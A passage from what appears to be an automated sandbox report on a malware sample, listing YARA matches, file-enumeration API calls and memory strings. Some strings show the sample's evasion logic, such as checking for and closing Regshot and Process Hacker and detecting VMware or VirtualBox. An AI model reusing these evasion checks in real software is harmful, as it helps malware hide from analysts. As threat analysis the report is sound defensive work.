                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2 PID: 1212, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 2788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6900, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262757418.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262623069.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2318771760.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238275486.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2321080150.0000000000E4A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238174115.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238117536.0000000000E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE-
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796536466.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797494978.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796610235.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797214639.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262109183.0000000000CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237944489.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2273458424.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238956203.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2295469789.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237897485.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238414557.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2320843178.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238321465.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")86
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEZ
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: dmqiuorkt.mp2, 00000007.00000003.1624969217.0000000001032000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624450480.0000000001027000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624768322.000000000102A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627128836.0000000001033000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812330526.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797643349.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: dmqiuorkt.mp2, 00000007.00000003.1624969217.0000000001032000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624450480.0000000001027000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624768322.000000000102A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627128836.0000000001033000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")SC%A
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627147751.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625792919.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796594142.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1811447953.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2313808824.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262109183.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2295004396.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262245963.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2339694117.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2270613615.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE"))
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2318771760.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238275486.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2321080150.0000000000E4A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238174115.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238117536.0000000000E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESP
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E rdtsc 14_2_01A0096E
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeWindow / User API: threadDelayed 3788
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeWindow / User API: threadDelayed 6186
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2API coverage: 5.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeAPI coverage: 5.2 %
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe TID: 2296Thread sleep count: 135 > 30
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe TID: 2296Thread sleep count: 49 > 30
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep count: 3788 > 30
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep time: -7576000s >= -30000s
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep count: 6186 > 30
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe TID: 1880Thread sleep time: -12372000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0024F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0024F826
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00261630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00261630
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00271FF8 FindFirstFileExA,0_2_00271FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_008BE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008C9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008CA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_008CA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_008C65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0088C642 FindFirstFileExW,7_2_0088C642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_008C72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008C7248 FindFirstFileW,FindClose,7_2_008C7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0039E387
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039D836
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039DB69
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003A9F9F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003AA0FA
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_003AA488
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A65F1 FindFirstFileW,FindNextFileW,FindClose,15_2_003A65F1
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0036C642 FindFirstFileExW,15_2_0036C642
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A7248 FindFirstFileW,FindClose,15_2_003A7248
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_003A72E9
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00264E14 VirtualQuery,GetSystemInfo,0_2_00264E14
                Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exeQ
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2245197297.0000000000DEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exet
                Source: tdggoffi.bin.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                Source: explorer.exe, 00000020.00000000.3696594073.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C76|OG
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then"w
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exedV
                Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: explorer.exe, 00000020.00000000.3696594073.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
                Source: tdggoffi.bin.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2256863608.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C71
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2256863608.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624835426.000000000105B000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625489878.0000000001072000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797287899.000000000172F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796448815.000000000171E000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796850285.0000000001723000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797308782.0000000001734000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 